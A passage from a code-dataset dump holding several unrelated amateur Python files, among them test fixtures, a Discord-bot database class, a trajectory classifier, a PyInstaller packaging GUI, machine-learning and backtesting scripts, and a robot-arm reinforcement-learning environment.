'some_login2',\n 'collectors': [\n {'errors': 5, 'collected': 6, 'total': 7},\n ],\n },\n { # No errors, multiple collectors\n 'login': 'some_login3',\n 'collectors': [\n {'errors': 5, 'collected': 6, 'total': 8},\n {'errors': 6, 'collected': 8, 'total': 3},\n {'errors': 7, 'collected': 9, 'total': 1},\n ],\n }\n ]\n\n\n@pytest.fixture\nasync def setup_report_data(org_id, create_user, create_collector, report_data):\n for user_data in report_data:\n user = await create_user(org_id=org_id, login=user_data['login'], error=user_data.get('error'))\n for collector_data in user_data.get('collectors', []):\n await create_collector(\n user_id=user.user_id,\n errors=collector_data['errors'],\n collected=collector_data['collected'],\n total=collector_data['total'],\n status=collector_data.get('status', 'ok'),\n )\n\n\n@pytest.fixture\ndef expected_report_response(report_data):\n from mail.ipa.ipa.core.entities.enums import UserImportError\n return '\\r\\n'.join(chain(\n ['login,error,collected,total,errors'],\n [\n ','.join([\n user_data['login'],\n UserImportError.get_error(\n user_error=user_data.get('error'),\n collector_status=collector_data.get('status'),\n ).value,\n str(collector_data.get('collected', '')),\n str(collector_data.get('total', '')),\n str(collector_data.get('errors', '')),\n ])\n for user_data in report_data\n for collector_data in user_data.get('collectors', [{}])\n if user_data.get('error') is not None or collector_data.get('status', 'ok') != 'ok'\n ],\n [''],\n ))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"mail/tests/data/report_data.py","file_name":"report_data.py","file_ext":"py","file_size_in_byte":2518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7635257650","text":"from classes.person import Person\nfrom classes.user import User\nfrom classes.school_lesson import School_Lesson\n\n\nclass School_Student(Person):\n def __init__(self, id=None):\n super().__init__()\n self._cursor = self._database_connection.cursor()\n\n if id is not None:\n self._id = id\n person, user = self.__fill_school_student(id=id) \n self._givenname = person._get_givenname()\n self._surname = person._get_surname()\n self._user = user\n else:\n pass\n\n def __fill_school_student(self, id):\n sql = f\"SELECT idperson, iddiscorduser FROM student WHERE idstudent={id}\"\n self._cursor.execute(sql)\n result = self._cursor.fetchone()\n return Person(id=result[0]), User(id=result[1])\n \n def _add_school_student_to_database(self, idperson, iduser):\n sql = f\"INSERT INTO student VALUES(null, {idperson}, {iduser})\"\n self._cursor.execute(sql)\n self._database_connection.commit()\n\n sql = \"SELECT LAST_INSERT_ID()\"\n self._cursor.execute(sql)\n return self._cursor.fetchone()[0]\n \n def _retrieve_student_by_userid(self, id):\n sql = f\"SELECT idstudent FROM student WHERE iddiscorduser={id}\"\n self._cursor.execute(sql)\n return self._cursor.fetchone()\n \n def _check_if_user_is_student(self, iduser):\n idstudent = self._retrieve_student_by_userid(id=iduser)[0]\n if idstudent is not None:\n return idstudent\n else:\n return None\n \n def _retrieve_attending_lessons(self):\n sql = f\"SELECT DISTINCT l.idlesson FROM student_has_lesson shl JOIN lesson l ON shl.idlesson=l.idlesson WHERE shl.idstudent={self._get_id()}\"\n self._cursor.execute(sql)\n result = self._cursor.fetchall()\n\n lessons = list()\n\n for idlesson in result:\n lessons.append(School_Lesson(id=idlesson[0]))\n\n return lessons\n\n def set_id(self, id):\n 
self._id = id\n \n def _get_id(self):\n return self._id\n","repo_name":"cube-m4st3r/class.discord-bot.py","sub_path":"src/classes/school_student.py","file_name":"school_student.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17212243886","text":"import pandas as pd\nfrom ast import literal_eval\nimport sys\nimport pdfcrowd\nimport gmplot\nimport math\nfrom dtw import dtw \nimport operator\n\ndef haversine_distance(origin, destination):\n\tradius = 6371 # FAA approved globe radius in km\n\tdlat = math.radians(destination[1]-origin[1])\n\tdlon = math.radians(destination[2]-origin[2])\n\ta = math.sin(dlat/2) * math.sin(dlat/2) + math.cos(math.radians(origin[1]))* math.cos(math.radians(destination[1])) * math.sin(dlon/2) * math.sin(dlon/2)\n\tc = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))\n\td = radius * c\n\treturn d\n\ndef FindNeig(trainingSet, testInstance, k=5):\n\tdistances = []\n\tfor x in range(len(trainingSet)):\n\t\t#print trainingSet[x][1]\n\t\tdist, cost, acc, path = dtw(trainingSet[x][1], testInstance, dist = haversine_distance)\n\t\tdistances.append((trainingSet[x][0], dist))\n\tdistances.sort(key=operator.itemgetter(1))\n\tneighbors = []\n\tfor x in range(k):\n\t\tneighbors.append(distances[x])\n\treturn neighbors\n\ndef Predict(neighbors):\n\tVotes = {}#majority voting \n\tw = 1\n\tfor x in range(len(neighbors)):\n\t\tresponse = neighbors[x][0]\n\t\tif response in Votes:#if it exists\n\t\t\t#Votes[response] += 1\n\t\t\tVotes[response] += (1/w)*neighbors[x][1]\n\t\telse:\n\t\t\t#Votes[response] =1\n\t\t\tVotes[response] = (1/w)*neighbors[x][1]\n\t\tw += 1\n\t#find the majority vote\n\tsortedVotes = sorted(Votes.iteritems(), key=operator.itemgetter(1), reverse=True)\n\treturn sortedVotes[0][0]\n\n\ntrainSet = pd.read_csv(\n'train_set.csv', # replace with the correct path\nconverters={\"Trajectory\": literal_eval},\nindex_col='tripId'\n)\n\ntestSet = pd.read_csv('test_set_a2.csv', converters={\"Trajectory\": literal_eval}, sep = '\\t')\ntempSet = testSet.as_matrix()\ntrainSetArr = trainSet.as_matrix()\n\n\ndata = {'Test_Trip_ID': [], 'Predicted_JourneyPatternID': []}\n \nfor i in range(len(tempSet)):\n\t#print tempSet[i][0]\n\tneig = FindNeig(trainSetArr,tempSet[i][0])\n\tprediction = Predict(neig)\n\tdata['Test_Trip_ID'].append(i)\n\tdata['Predicted_JourneyPatternID'].append(prediction)\n\ndf = pd.DataFrame(data, columns=['Test_Trip_ID', 'Predicted_JourneyPatternID'])\n\ndf.to_csv('testSet_JourneyPatternIDs.csv')\n\n\n\n","repo_name":"IliasBarmpar/Data-Mining-uni-course","sub_path":"2. 
Visualization, Dynamic Time Warping and Longest Common Subsequence/er_3.py","file_name":"er_3.py","file_ext":"py","file_size_in_byte":2099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3330999224","text":"\r\nimport os\r\nimport tkinter as tk\r\nfrom pathlib import Path\r\nfrom tkinter import filedialog as fd\r\nfrom tkinter import messagebox\r\n\r\nwindow = tk.Tk() #初始化\r\nwindow.title(\"自动打包\") #设置标题\r\nwindow.geometry(\"330x200\")\r\nfile = ''\r\n图标_=''\r\ndef i():\r\n return os.path.join(os.path.expanduser('~'),\"Desktop\")\r\nfile1=i()\r\nfile1 = file1.rstrip()\r\ne_file = tk.Entry(window)\r\nw_file = tk.Entry(window)\r\nlabel_pixel= tk.Label(window, text='选择打包类型')\r\ndef mkdir(path):\r\n isExists=os.path.exists(path)\r\n if not isExists:\r\n # 如果不存在则创建目录\r\n # 创建目录操作函数\r\n os.makedirs(path) \r\n print (path+' 创建成功')\r\ndef askfile():\r\n global file\r\n file = fd.askopenfilename()\r\n e_file.delete(0,'end')\r\n e_file.insert(0,file)\r\ndef askfile1():\r\n global file1\r\n file1 = fd.askdirectory()\r\ndef askfile2():\r\n global 图标_\r\n 图标_ = fd.askopenfilename()\r\n w_file.delete(0,'end')\r\n w_file.insert(0,file)\r\ndef djalk():\r\n ttt=list_color.selection_get()\r\n os.system(f'pip install -i https://pypi.tuna.tsinghua.edu.cn/simple pyinstaller')\r\n file2=file1+'/exe文件所在地'\r\n mkdir(file2)\r\n if ttt=='有图标,隐藏界面':\r\n os.chdir(file2)\r\n os.system(f'pyinstaller -F -w -i{图标_} {file}')\r\n elif ttt=='有图标':\r\n os.chdir(file2)\r\n os.system(f'pyinstaller -F -i{图标_} {file}')\r\n elif ttt=='隐藏界面':\r\n os.chdir(file2)\r\n os.system(f'pyinstaller -F -w {file}')\r\n elif ttt=='没有图标也不隐藏界面':\r\n os.chdir(file2)\r\n os.system(f'pyinstaller -F {file}')\r\ndef gg():\r\n messagebox.showinfo('使用须知',\"\"\" \\t 自动打包器\r\n 使用须知:\r\n\\t2.0版本自动pip pyinstaller!!!!!\r\n\\tpip uninstall pyinstaller 可以用这个卸载pyinstaller试一试。\r\n\\t保存在 D:/要改自己改。\r\n\\t打包完成后然后会出现两个文件夹: 'build','dist'\r\n\\texe文件保存在'dist'当中。\r\n\\t需要等一个大约120秒。\r\n\\t请不要看到未响应就把它关了。\r\n\"\"\")\r\nb1 = tk.Button(window, text='点击开始转换',command=djalk)\r\nb2 = tk.Button(window, text='使用须知',command=gg)\r\nPicture_location = tk.Button(window,text=\"选择py文件位置\",command=askfile,cursor='hand2')\r\nPicture_location2 = tk.Button(window,text=r\"更改保存位置(默认是D:\\)\",command=askfile1,cursor='hand2')\r\nFilter = tk.Button(window,text=\"选择图标位置\",command=askfile2,cursor='hand2')\r\nlist_color = tk.Listbox(window, height=4)\r\nlist_color.insert('end', '有图标,隐藏界面')\r\nlist_color.insert('end', '有图标')\r\nlist_color.insert('end', '隐藏界面')\r\nlist_color.insert('end', '没有图标也不隐藏界面')\r\nPicture_location.grid(row=0,column=0,pady=5,padx=10)\r\ne_file.grid(row=1,column=0,pady=5,padx=10)\r\nFilter.grid(row=2,column=0,pady=5,padx=10)\r\nw_file.grid(row=3,column=0,pady=5,padx=10)\r\nlabel_pixel.grid(row=0,column=1)\r\nPicture_location2.grid(row=3,column=1)\r\nlist_color.grid(row=1,column=1,rowspan=2,pady=5,padx=10)\r\nb1.grid(row=5,column=1,pady=5,padx=10)\r\nb2.grid(row=5,column=0,pady=5,padx=10)\r\nwindow.mainloop()\r\n#\r\n\r\n","repo_name":"zhanghanGithub/-python-","sub_path":"自动打包2.0.py","file_name":"自动打包2.0.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"37053845282","text":"\"\"\"\r\n\r\nCodes by Farhan\r\n\r\n\"\"\"\r\n\r\n## Regression Template ##\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\nds = 
 +{"seq_id":"37053845282","text":"\"\"\"\r\n\r\nCodes by Farhan\r\n\r\n\"\"\"\r\n\r\n## Regression Template ##\r\n\r\n# Importing the libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\n\r\n# Importing the dataset\r\nds = pd.read_csv('Data.csv')\r\nX = ds.iloc[:, :-1].values\r\ny = ds.iloc[:, -1].values\r\n\r\n# Splitting the dataset into the Training set and Test set\r\n\"\"\"\r\nfrom sklearn.model_selection import train_test_split\r\nX_train, X_test, y_train, y_test = \\\r\ntrain_test_split(X, y, test_size = 0.2, random_state = 0)\r\n\"\"\"\r\n\r\n# Feature Scaling\r\n\"\"\"from sklearn.preprocessing import StandardScaler\r\nsc_X = StandardScaler()\r\nX_train = sc_X.fit_transform(X_train)\r\nX_test = sc_X.transform(X_test)\r\nsc_y = StandardScaler()\r\ny_train = sc_y.fit_transform(y_train)\"\"\"\r\n\r\n# Fitting the Regression Model to the dataset\r\nfrom sklearn.linear_model import LinearRegression\r\nregressor = LinearRegression()\r\n\r\nfrom sklearn.preprocessing import PolynomialFeatures\r\nregressor = PolynomialFeatures(degree = 4)\r\nX_poly = regressor.fit_transform(X)\r\n\r\nfrom sklearn.svm import SVR\r\nregressor = SVR(kernel = 'rbf')\r\n\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nregressor = DecisionTreeRegressor()\r\n\r\nfrom sklearn.ensemble import RandomForestRegressor\r\nregressor = RandomForestRegressor(n_estimators = 100)\r\n\r\n\r\nregressor.fit(X,y)\r\n\r\n# Predicting a new result (predict expects a 2-D array)\r\ny_pred = regressor.predict([[10]])\r\n\r\n# In the case where we scaled the variables:\r\n\"\"\"\r\ny_pred = sc_y.inverse_transform(\r\n    regressor.predict(sc_X.transform(np.array([[10]]))))\r\n\"\"\"\r\n\r\n# Visualising the Regression results \r\nX_grid = np.arange(min(X), max(X), 0.1)\r\nX_grid = X_grid.reshape((len(X_grid), 1))\r\nplt.scatter(X, y, color = 'red')\r\nplt.plot(X_grid, regressor.predict(X_grid), color = 'blue')\r\nplt.title('Title')\r\nplt.xlabel('Independent variable')\r\nplt.ylabel(list(ds)[-1])\r\nplt.show()","repo_name":"farhanchoudhary/Machine_Learning_A-Z_All_Codes_and_Templates","sub_path":"Annex. 
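# Aside: in the template above every `regressor = ...` line rebinds the same name, so
# only the RandomForestRegressor is ever fitted (and PolynomialFeatures is a
# transformer, not a regressor). A sketch that fits each candidate properly, assuming
# X and y as prepared in the template with a single feature column:
from sklearn.linear_model import LinearRegression
from sklearn.preprocessing import PolynomialFeatures
from sklearn.pipeline import make_pipeline
from sklearn.svm import SVR
from sklearn.tree import DecisionTreeRegressor
from sklearn.ensemble import RandomForestRegressor

candidates = {
    'linear': LinearRegression(),
    'poly4': make_pipeline(PolynomialFeatures(degree=4), LinearRegression()),
    'svr': SVR(kernel='rbf'),
    'tree': DecisionTreeRegressor(),
    'forest': RandomForestRegressor(n_estimators=100),
}
for name, model in candidates.items():
    model.fit(X, y)
    print(name, model.predict([[10]]))  # predict expects a 2-D array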
1 - All Templates/Regression Template in Python.py","file_name":"Regression Template in Python.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"72"} +{"seq_id":"22008199336","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport time,sys,json\nfrom selenium import webdriver\nfrom installApplication_interface import *\n\ndef getJson(browserType,version):\n try:\n jsonPWD = \"./webdriverMap.json\"\n if os.path.exists(jsonPWD):\n with open(jsonPWD,\"r\") as load_f:\n load_dict = json.load(load_f)\n appPWD = os.getcwd()\n if platform.system() == \"Windows\":\n versionPWD = appPWD+load_dict[browserType][str(version)].replace(\"/\", \"\\\\\")\n else:\n versionPWD = appPWD + load_dict[browserType][str(version)]\n return versionPWD\n else:\n print('警告', '请将webdriverMap.json移到程序相同路径下')\n except:\n print('警告', 'json文件格式有问题或者键值对不存在')\ndef closeProcess(browserType):\n if browserType == \"macchrome\":\n os.system(\"ps -ef | grep \" + \"Google\" + \" | grep -v grep | awk '{print $2}' | xargs kill -9\")\n elif browserType == \"macfirefox\":\n os.system(\"ps -ef | grep \" + \"Firefox\" + \" | grep -v grep | awk '{print $2}' | xargs kill -9\")\n elif browserType == \"winchrome\":\n os.system(\"taskkill /f /im \" + \"Chrome\" + \".exe\")\n elif browserType == \"winfirefox\":\n os.system(\"taskkill /f /im \" + \"Firefox\" + \".exe\")\n\ndef openBrowser(browserType,version):\n webdriverPwd = getJson(browserType, version)\n closeProcess(browserType)\n driver =\"\"\n if browserType == \"macchrome\":\n os.environ[\"webdriver.Chrome.driver\"] = webdriverPwd\n\n macoption = webdriver.ChromeOptions()\n prefs = {'profile.default_content_setting_values.media_stream_camera': 1,\n 'profile.default_content_setting_values.media_stream_mic': 1,\n 'profile.default_content_setting_values.notifications': 1,\n 'profile.default_content_setting_values.geolocation': 1}\n macoption.add_experimental_option('prefs', prefs)\n driver = webdriver.Chrome(executable_path=webdriverPwd, chrome_options=macoption)\n printMy(driver.capabilities['version'])\n elif browserType == \"macfirefox\":\n os.environ[\"webdriver.Firefox.driver\"] = webdriverPwd\n macprofile = webdriver.FirefoxProfile()\n macprofile.set_preference('media.navigator.permission.disabled', True)\n macprofile.update_preferences()\n driver = webdriver.Firefox(executable_path=webdriverPwd, firefox_profile=macprofile)\n printMy(driver.capabilities['browserVersion'])\n elif browserType == \"winchrome\":\n os.environ[\"webdriver.Chrome.driver\"] = webdriverPwd\n winoption = webdriver.ChromeOptions()\n prefs = {'profile.default_content_setting_values.media_stream_camera': 1,\n 'profile.default_content_setting_values.media_stream_mic': 1,\n 'profile.default_content_setting_values.notifications': 1,\n 'profile.default_content_setting_values.geolocation': 1}\n winoption.add_experimental_option('prefs', prefs)\n driver = webdriver.Chrome(executable_path=webdriverPwd, chrome_options=winoption)\n printMy(driver.capabilities['version'])\n elif browserType == \"winfirefox\":\n os.environ[\"webdriver.Firefox.driver\"] = webdriverPwd\n winprofile = webdriver.FirefoxProfile()\n winprofile.set_preference('media.navigator.permission.disabled', True)\n winprofile.update_preferences()\n driver = webdriver.Firefox(executable_path=webdriverPwd, firefox_profile=winprofile)\n printMy(driver.capabilities['browserVersion'])\n return driver\n\ndef printMy(String):\n print('\\033[1;35m%s 
\\033[0m!'%String)\n\ndef testCase(browserType,version):\n driver = openBrowser(browserType,version)\n # pyautogui.press(\"enter\")\n driver.get(\n \"https://webdemo.agora.io/premium_rtc_test_2.5/show.html?channelName=asdsd&videoProfile=480p_4&uid=&uidtype=int&mode=live&codec=vp8&interop_mode=interop_commutication&avmode=0&dynamic=disabled&expiration=0&custom_key=&key=disabled&proxy=disabled&turnServerIP=113.207.108.198&udpPort=3478&tcpPort=3433&username=test&password=111111&forceTurn=disabled&nginxURL=webopt.agorabeckon.com&encrypt=disabled&encryptMode=none&encryptPassword=&preprocessing=disabled\")\n time.sleep(5)\n driver.quit()\n\ndef main(browserType,version):\n if browserType == \"macchrome\":\n uninstall_chrome_on_mac()\n install_chrome_on_mac(version)\n testCase(browserType,version)\n elif browserType == \"macfirefox\":\n uninstall_firefox_on_mac()\n install_firefox_on_mac(version)\n testCase(browserType, version)\n elif browserType == \"winchrome\":\n uninstall_chrome_on_win()\n install_chrome_on_win(version)\n testCase(browserType,version)\n elif browserType == \"winfirefox\":\n uninstall_firefox_on_win()\n install_firefox_on_win(version)\n testCase(browserType, version)\n\ndef runCom(jsonStr):\n jsonDict = eval(jsonStr)\n for key in jsonDict.keys():\n if isinstance(jsonDict[key], tuple):\n for version in jsonDict[key]:\n main(key, str(version))\n elif isinstance(jsonDict[key], int):\n main(key,str(jsonDict[key]))\n else:\n print(\"please send the version of int or tuple\")\n# if __name__ == '__main__':\n# # main(\"winchrome\",\"68\")\n# # main(\"winchrome\",\"69\")\n# # main(\"winfirefox\",\"63\")\n# # main(\"winfirefox\",\"64\")\n# # main(\"macchrome\",\"68\")\n# # main(\"macchrome\",\"69\")\n# # main(\"macfirefox\",\"63\")\n# # main(\"macfirefox\",\"64\")\n#\n# if len(sys.argv) < 2:\n# print('''run as: python3 browserCompatibility.py '{\"macchrome\": (10,11,12),\"macfirefox\": (50,51,52)}'\n# ''')\n# exit(1)\n# jsonStr = sys.argv[1]\n# print(jsonStr)\n# jsonDict = eval(jsonStr)\n# print(jsonDict)\n# for key in jsonDict.keys():\n# if isinstance(jsonDict[key], tuple):\n# for version in jsonDict[key]:\n# # main(key,version)\n# print(key,version)\n# elif isinstance(jsonDict[key], int):\n# print(jsonDict[key])\n# # main(key,jsonDict[key])\n# else:\n# print(\"please send the version of int or tuple\")\n\n\n# runCom('{\"winchrome\":(\"68\")}')","repo_name":"lisen886/CompatibilityTestSystem","sub_path":"browserCompatibility.py","file_name":"browserCompatibility.py","file_ext":"py","file_size_in_byte":6337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20240987610","text":"class Solution:\n def mergeAlternately(self, word1: str, word2: str) -> str:\n w1 = collections.deque(word1)\n w2 = collections.deque(word2)\n res = []\n while len(w1) > 0 and len(w2) > 0:\n res.append (w1.popleft())\n res.append (w2.popleft())\n\n while len(w1) > 0:\n res.append (w1.popleft())\n while len(w2) > 0:\n res.append (w2.popleft())\n\n return ''.join(res)","repo_name":"Mehariwamlake/competitive-Programming","sub_path":"merge_sring.py","file_name":"merge_sring.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41045563182","text":"import argparse\nimport logging\nimport pandas as pd\nimport sys\nimport os\n\nfrom strategies import Breakout\nfrom strategies import MeanReversion\nfrom strategies import TrendFollowing\nfrom strategies import 
SMACrossover\nfrom strategies import OrderFlow\nfrom strategies import FiveMinuteScalper\nfrom pyalgotrade import plotter\n\n# Set up the logging level and format\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)s %(levelname)s %(message)s\")\n \nclass Backtest:\n def __init__(self, symbol, level2_Data, features, model, csv_data_path):\n self.symbol = symbol\n self.level2Data = level2_Data\n self.features = features\n self.model = model\n self.csv_data_path = csv_data_path\n self.data = pd.read_csv(csv_data_path)\n\ndef backtest_strategies(self):\n \"\"\"\n Runs a series of backtests on different trading strategies.\n \"\"\"\n try:\n strategies = [Breakout(), MeanReversion(), TrendFollowing(), SMACrossover(), OrderFlow()]\n for strategy in strategies:\n strategy.run(self.symbol, self.level2Data, self.features, self.model)\n except ImportError:\n logging.error(\"Strategy module not found.\")\n sys.exit(1)\n except Exception as e:\n logging.error(\"Error occurred during backtest: %s\", str(e))\n\n# backtest_breakout_strategy\ndef backtest_breakout(self, symbol, level2Data, features, model):\n try:\n # Create the strategy\n strategy = Breakout()\n\n # Run the strategy\n strategy.run(symbol, level2Data, features, model)\n\n # Plot the results\n plt = plotter.StrategyPlotter(strategy)\n plt.plot()\n\n except Exception as e:\n logging.error(\"An error occurred: %s\", str(e))\n sys.exit(1)\n\n# backtest_fiveminutescalper\ndef backtest_fiveminutescalper(symbol, level2Data, features, model):\n try:\n # Create the strategy\n strategy = FiveMinuteScalper(symbol, level2Data, features, model)\n\n # Run the strategy\n strategy.run()\n\n # Plot the results\n plt = plotter.StrategyPlotter(strategy)\n plt.plot()\n\n except Exception as e:\n logging.error(\"An error occurred: %s\", str(e))\n sys.exit(1)\n\n# backtest_mean_reversion\ndef backtest_mean_reversion(symbol, level2Data, features):\n try:\n # Create the strategy\n strategy = MeanReversion(symbol, level2Data, features)\n\n # Run the strategy\n strategy.run()\n\n # Plot the results\n plt = plotter.StrategyPlotter(strategy)\n plt.plot()\n\n except Exception as e:\n logging.error(\"An error occurred: %s\", str(e))\n sys.exit(1)\n\n# backtest_sma_crossover\ndef backtest_sma_crossover(symbol, level2Data, features):\n try:\n # Create the strategy\n strategy = SMACrossover(symbol, level2Data, features)\n\n # Run the strategy\n strategy.run()\n\n # Plot the results\n plt = plotter.StrategyPlotter(strategy)\n plt.plot()\n\n except Exception as e:\n logging.error(\"An error occurred: %s\", str(e))\n sys.exit(1)\n \n# backtest_order_flow\ndef backtest_order_flow(symbol, level2Data, features):\n try:\n # Create the strategy\n strat = OrderFlow(symbol, level2Data, features)\n\n # Run the strategy\n strat.run()\n\n # Plot the results\n plt = plotter.StrategyPlotter(strat)\n plt.plot()\n\n except Exception as e:\n logging.error(\"An error occurred: %s\", str(e))\n sys.exit(1)\n\ndef main():\n # Define the command-line arguments\n parser = argparse.ArgumentParser(description=\"Backtest different trading strategies on KuCoin\")\n\n parser.add_argument(\"-s\", \"--symbol\", type=str, required=True, help=\"The trading symbol to backtest on\")\n\n parser.add_argument(\"-sd\", \"--start_date\", type=str, required=True, help=\"The start date of the backtesting period in YYYY-MM-DD format\")\n\n parser.add_argument(\"-ed\", \"--end_date\", type=str, required=True, help=\"The end date of the backtesting period in YYYY-MM-DD format\")\n\n 
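# Aside: further down, main() passes (args.symbol, args.start_date, args.end_date,
# args.quantity) to functions that are defined above as (symbol, level2Data,
# features), and backtest_fiveminutescalper() is called with two arguments although
# it takes four. A dispatch-table sketch for the three helpers that do share a
# signature (the mapping below is illustrative, not part of the original module):
BACKTESTS = {
    'mean_reversion': backtest_mean_reversion,
    'smacrossover': backtest_sma_crossover,
    'orderflow': backtest_order_flow,
}

def run_backtest(strategy_name, symbol, level2_data, features):
    try:
        strategy_fn = BACKTESTS[strategy_name]
    except KeyError:
        raise ValueError(f'unknown strategy: {strategy_name}')
    return strategy_fn(symbol, level2_data, features)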
parser.add_argument(\"-q\", \"--quantity\", type=float, required=True, help=\"The quantity of the asset to trade in each transaction\")\n\n parser.add_argument(\"-st\", \"--strategy\", type=str, required=True, choices=[\"fiveminutescalper\", \"trend_following\", \"mean_reversion\"], help=\"The strategy to backtest\")\n\n parser.add_argument(\"-fp\", \"--file_path\", type=str, default=None, help=\"The file path of the CSV data for fiveminutescalper strategy\")\n\n parser.add_argument(\"-mp\", \"--model_path\", type=str, default=None, help=\"The file path of the ANN model for fiveminutescalper strategy\")\n \n # Parse the command-line arguments\n args = parser.parse_args()\n \n if args.file_path is None or args.model_path is None:\n raise ValueError(\"You need to provide both file_path and model_path\")\n else: \n \n # Trading configuration\n window_size=100\n trading_fee=0.008\n slippage=0.001\n \n df = pd.read_csv ('file_name.csv')\n \n KucoinTradingBot = KucoinTradingBot()\n features = KucoinTradingBot.get_features(df)\n \n # Call the corresponding backtesting function based on the strategy argument\n if args.strategy == \"fiveminutescalper\":\n backtest_fiveminutescalper(args.file_path, args.model_path)\n \n elif args.strategy == \"mean_reversion\":\n backtest_mean_reversion(args.symbol, args.start_date, args.end_date, args.quantity)\n \n elif args.strategy == \"breakout\":\n backtest_breakout(args.symbol, args.start_date, args.end_date, args.quantity)\n \n elif args.strategy == \"smacrossover\":\n backtest_sma_crossover(args.symbol, args.start_date, args.end_date, args.quantity)\n \n elif args.strategy == \"orderflow\":\n backtest_order_flow(args.symbol, args.start_date, args.end_date, args.quantity)\n \n def preprocess_data(self):\n self.data['datetime'] = pd.to_datetime(self.data['openTime'])\n self.data.set_index('datetime', inplace=True)\n self.data['target'] = self.data['closePrice'].shift(-1)\n self.data.dropna(inplace=True)\n\n # Sort the DataFrame by the index (datetime)\n self.data = self.data.sort_index()\n\n # Now drop the unnecessary columns\n self.X = self.data.drop(columns=['symbol', 'openTime', 'target'])\n\n # Convert y to a 1D array\n self.y = np.array(self.data['target']).ravel()\n \nif __name__ == \"__main__\":\n # Run the main function\n main()","repo_name":"mOrGaNCrYpTo/omega_bot","sub_path":"src/strategies/backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":6612,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"39568000165","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 7 14:14:42 2019\n\n@author: yangna\n\n@e-mail: ityangna0402@163.com\n\"\"\"\n\nimport numpy as np\n\nclass ArmEnv(object):#手臂的逻辑运动和动作等\n state_shape = 2#2个观测值\n action_shape = 2#2个动作\n #转动角度范围\n action_threshold = [-1, 1]\n dis = None\n #目标点\n goal = {'x_val': 100., 'y_val': 100., 'l_val': 40}\n dt = 0.1\n \n def __init__(self):\n #[(100., 0.5235988), (100., 0.5235988)]\n self.arm_info = np.zeros(2, dtype=[('len', np.float32), ('ran', np.float32)])\n self.arm_info['len'] = 100#两段手臂的长度\n self.arm_info['ran'] = np.pi/6#两段手臂的旋转角度\n \n def reset(self):\n self.arm_info['ran'] = 2*np.pi*np.random.rand(2)\n return self.arm_info['ran']\n \n def sample_action(self):\n return np.random.rand(2)-0.5\n \n def render(self):\n if self.dis is None:\n self.dis = display(self.arm_info, self.goal)\n self.dis.render()\n \n def step(self, action):\n done = False\n reward = 0.\n #计算单位时间dt内旋转的角度,将角度限制在360度以内\n action = 
\n        self.arm_info['ran'] += action * self.dt\n        self.arm_info['ran'] %= np.pi * 2\n        # use the two joint angles as the state\n        state = self.arm_info['ran']\n        # compute the fingertip position; the episode ends when it touches the goal\n        (a1l, a2l) = self.arm_info['len']\n        (a1r, a2r) = self.arm_info['ran']\n        a1xy = np.array([200., 200.])\n        a1xy_ = np.array([np.cos(a1r), np.sin(a1r)]) * a1l + a1xy\n        finger = np.array([np.cos(a1r + a2r), np.sin(a1r + a2r)]) * a2l + a1xy_\n\n        # derive done and reward from the finger and goal positions\n        if (self.goal['x_val'] - self.goal['l_val']/2 < finger[0] < self.goal['x_val'] + self.goal['l_val']/2) and (self.goal['y_val'] - self.goal['l_val']/2 < finger[1] < self.goal['y_val'] + self.goal['l_val']/2):\n            done = True\n            reward = 1.\n        return state, reward, done\n    \n    def close(self):\n        self.dis.stopandclose()\n\n# pyglet API reference: https://pythonhosted.org/pyglet/\nimport pyglet# https://pyglet.readthedocs.io/en/pyglet-1.3-maintenance/#\nclass display(pyglet.window.Window):# arm visualization\n    bar_thc = 5\n    def __init__(self, arm_info, goal):# draw the robot arm\n        # vsync=True locks redraws to the screen refresh rate; False does not\n        super(display, self).__init__(width=400, height=400, resizable=False, caption='Arm', vsync=False)\n        \n        self.arm_info = arm_info\n        self.center_coord = np.array([200, 200])# window center, the arm's base point\n        \n        pyglet.gl.glClearColor(1, 1, 1, 1)# window background color\n        self.batch = pyglet.graphics.Batch()# draw batch\n        # add the blue goal square\n        self.goal = self.batch.add(\n            # GL_QUADS is documented at https://pyglet.readthedocs.io/en/pyglet-1.3-maintenance/programming_guide/graphics.html\n            4, pyglet.gl.GL_QUADS, None,# 4 vertices\n            # 'v2f' and 'c3B' are explained at\n            # https://pyglet.readthedocs.io/en/pyglet-1.3-maintenance/programming_guide/graphics.html#vertex-attributes\n            ('v2f', [goal['x_val'] - goal['l_val'] / 2, goal['y_val'] - goal['l_val'] / 2,#x1,y1\n                     goal['x_val'] - goal['l_val'] / 2, goal['y_val'] + goal['l_val'] / 2,#x2,y2\n                     goal['x_val'] + goal['l_val'] / 2, goal['y_val'] + goal['l_val'] / 2,#x3,y3\n                     goal['x_val'] + goal['l_val'] / 2, goal['y_val'] - goal['l_val'] / 2]),#x4,y4\n            ('c3B', (86, 109, 249) * 4))# c3B sets the color; all 4 vertices are (86, 109, 249)\n        # add the first arm segment\n        self.arm1 = self.batch.add(\n            4, pyglet.gl.GL_QUADS, None,\n            ('v2f', [250, 250,\n                     250, 300,\n                     260, 300,\n                     260, 250]),\n            ('c3B', (249, 86, 86) * 4,))\n        # add the second arm segment\n        